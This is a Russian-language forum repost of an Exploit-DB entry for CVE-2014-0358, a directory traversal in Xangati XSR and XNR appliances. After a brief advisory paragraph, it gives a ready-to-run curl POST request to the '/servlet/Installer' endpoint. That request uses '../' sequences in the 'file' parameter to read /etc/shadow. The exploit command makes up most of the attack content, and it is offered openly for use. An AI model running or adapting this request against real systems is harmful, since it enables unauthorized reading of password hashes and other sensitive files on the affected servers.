Exploit Xangati - '/servlet/Installer?file' Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39143
Проверка EDB
  1. Пройдено
Автор
JAN KADIJK
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
cve-2014-0358
Дата публикации
2014-04-14
Xangati - '/servlet/Installer?file' Directory Traversal
Код:
source: https://www.securityfocus.com/bid/66817/info
 
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
 
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
 
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'
 
Источник
www.exploit-db.com

Похожие темы